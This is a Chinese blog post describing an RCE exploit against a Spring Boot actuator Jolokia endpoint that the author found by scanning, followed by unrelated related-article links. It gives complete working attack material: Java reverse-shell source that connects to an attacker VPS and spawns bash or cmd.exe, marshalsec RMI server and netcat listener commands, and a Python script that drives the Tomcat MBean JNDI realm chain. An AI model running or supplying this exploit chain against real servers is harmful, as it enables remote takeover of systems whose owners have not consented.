日穿扫描扫到一个spring boot actuator

可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字



可以使用jolokia-realm-jndi-rce具体步骤如下

先用python3开一个web服务

python3 -m http.server 8080

编译java利用代码

/**

 *  javac -source 1.5 -target 1.5 JNDIObject.java

 *

 *  Build By LandGrey

 * */

import java.io.File;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class JNDIObject {

    static {

        try{

            String ip = "your-vps-ip";

            String port = "443";

            String py_path = null;

            String[] cmd;

            if (!System.getProperty("os.name").toLowerCase().contains("windows")) {

                String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};

                for(int i = 0; i < py_envs.length; ++i) {

                    String py = py_envs[i];

                    if ((new File(py)).exists()) {

                        py_path = py;

                        break;

                    }

                }

                if (py_path != null) {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};

                    } else {

                        cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};

                    }

                } else {

                    if ((new File("/bin/bash")).exists()) {

                        cmd = new String[]{"/bin/bash"};

                    } else {

                        cmd = new String[]{"/bin/sh"};

                    }

                }

            } else {

                cmd = new String[]{"cmd.exe"};

            }

            Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();

            Socket s = new Socket(ip, Integer.parseInt(port));

            InputStream pi = p.getInputStream();

            InputStream pe = p.getErrorStream();

            InputStream si = s.getInputStream();

            OutputStream po = p.getOutputStream();

            OutputStream so = s.getOutputStream();

            while(!s.isClosed()) {

                while(pi.available() > 0) {

                    so.write(pi.read());

                }

                while(pe.available() > 0) {

                    so.write(pe.read());

                }

                while(si.available() > 0) {

                    po.write(si.read());

                }

                so.flush();

                po.flush();

                Thread.sleep(50L);

                try {

                    p.exitValue();

                    break;

                } catch (Exception e) {

                }

            }

            p.destroy();

            s.close();

        }catch (Throwable e){

            e.printStackTrace();

        }

    }

}


javac -source 1.5 -target 1.5 JNDIObject.java

架设恶意 rmi 服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389

监听端口

nc -lvp 443



执行exp

#!/usr/bin/env python3

# coding: utf-8

# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt

import requests

url = 'http://127.0.0.1:8080/jolokia'

create_realm = {

    "mbean": "Tomcat:type=MBeanFactory",

    "type": "EXEC",

    "operation": "createJNDIRealm",

    "arguments": ["Tomcat:type=Engine"]

}

wirte_factory = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "contextFactory",

    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

write_url = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "WRITE",

    "attribute": "connectionURL",

    "value": "rmi://your-vps-ip:1389/JNDIObject"

}

stop = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "stop",

    "arguments": []

}

start = {

    "mbean": "Tomcat:realmPath=/realm0,type=Realm",

    "type": "EXEC",

    "operation": "start",

    "arguments": []

}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:

    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))

    r = requests.post(url, json=i)

    r.json()

    print(r.status_code)


python3 springboot-realm-jndi-rce.py



然后等两秒shell就回来了

那些年拿过的shell之springboot jolokia rce的更多相关文章

  1. springboot打包不同环境配置与shell脚本部署

    本篇和大家分享的是springboot打包并结合shell脚本命令部署,重点在分享一个shell程序启动工具,希望能便利工作: profiles指定不同环境的配置 maven-assembly-plu ...

  2. Shell脚本 自动部署 SpringBoot 应用

    公司项目使用了SpringBoot.开发的应用需要自动上传到服务器.虽然目前对热部署还没完全掌握.先使用shell简化一下部署吧. # 上传密钥 sshLoginKey=/f/MyFile/root. ...

  3. 【springboot】之利用shell脚本优雅启动,关闭springboot服务

    springbot开发api接口服务,生产环境中一般都是运行独立的jar,在部署过程中涉及到服务的优雅启动,关闭, springboot官方文档给出的有两种方式, 1.使用http shutdown ...

  4. 在idea中编写自动拉取、编译、启动springboot项目的shell脚本

    idea 开发环境搭建 idea中安装shell开发插件 服务器具备的条件 已经安装 lsof(用于检查端口占用) 已安装 git 安装 maven 有 java 环境 背景 代码提交到仓库后,需要在 ...

  5. 编写shell脚本让springboot项目在CentOS中开机自启动

    springboot项目部署在CentOS系统上时,如果遇到停电关机,公司的实施人员就得跑到甲方现场重新启动项目并测试,很是麻烦,这里探讨如何编写shell脚本控制springboot项目开机时自动启 ...

  6. Dockerfile 构建后端springboot应用并用shell脚本实现jenkins自动构建

    Dockerfile 文件构建docker镜像 FROM centos MAINTAINER zh*****eng "z*******ch.cn" ENV LANG en_US.U ...

  7. SpringBoot打成的jar包发布,shell关闭之后一直在服务器运行

    1:可以编写shell脚本, 切换到执行的jar包目录,然后使用nohup  让改命令在服务器一直运行 #!/bin/bash cd /srv/ftp/public nohup java -jar l ...

  8. springboot使用api操作HBase之shell

    HBase的基本读写流程写入流程读取流程HBase的模块与协作HBase启动RegionServer失效HMaster失效HBase常用的Shell命令进入shellhelp命令查询服务器状态查看所有 ...

  9. 编写shell脚本,使用 nohup 让springboot 项目在后台持续运行

    1.将springboot项目打成jar放在linux的某个目录下. 2.新建一个nohup.log文件. 3.使用vi命令新建一个start.sh文件并写下以下内容: #!/bin/sh nohup ...

随机推荐

  1. 洛谷 P2296 【寻找道路】

    这道题真的很女少啊 言归正传: 这道题其实就是考验的思路,读题后,我们发现对于某个点他所连接的点必须连接终点,那么我们直接反向存图,从终点进行bfs,可以找到未连接的点,然后对这些点所连接的点进行标记 ...

  2. C++ 调用Python文件方法传递字典参数并接收返回值

    首先本地需要安装有Python环境,然后在c++工程中包含Python的头文件,引用Python的lib库. //python 初始化 Py_Initialize(); if (!Py_IsIniti ...

  3. css3条件判断_@supports的用法/Window.CSS.supports()的使用

    为了判断浏览器是否支持css3的一些新属性样式,当不兼容该样式的时候,我们可以更优雅的降级处理.这就需要使用到css3的条件判断功能:在css中支持@supports标记.或者在js中使用CSS.su ...

  4. c++ 随机生成带权联通无向图

    提示 1.请使用c++11编译运行 2.默认生成100个输出文件,文件名为data1.in到data100.in,如有需要自行修改 3.50000以下的点1s内可以运行结束,50000-300000的 ...

  5. Spring-boot 启动报错 调试小技巧

    描述: 我们在启动spring-boot,spring-cloud 项目时,是不是经常 遇到报错,但是在控制台 没有能找到 具体 报错信息,只是 提示,启动失败,缺乏具体的报错信息,这样就很不方便我们 ...

  6. flask 源码专题(十):flash源码研究

    flash源码 def flash(message, category="message"): flashes = session.get("_flashes" ...

  7. 数据可视化之DAX篇(一)Power BI时间智能函数如何处理2月29日的?

    https://zhuanlan.zhihu.com/p/109964336 ​今年是闰年,有星友问我,在Power BI中,2月29日的上年同期是怎么计算的? 这是个好问题,正好梳理一下,Power ...

  8. scrapy 源码解析 (三):启动流程源码分析(三) ExecutionEngine执行引擎

    ExecutionEngine执行引擎 上一篇分析了CrawlerProcess和Crawler对象的建立过程,在最终调用CrawlerProcess.start()之前,会首先建立Execution ...

  9. Linux如何用脚本监控Oracle发送警告日志ORA-报错发送邮件

    Linux如何用脚本监控Oracle发送警告日志ORA-报错发送邮件 前言 公司有购买的监控软件北塔系统监控,由于购买的版权中只包含了有限台数据库服务器的监控,所以只监控了比较重要的几台服务器. 后边 ...

  10. vue + echart 实现中国地图 和 省市地图(可切换省份)

    一.中国地图 1.先导入echarts,然后再main.js里引入echarts // 引入echartsimport echarts from 'echarts'Vue.prototype.$ech ...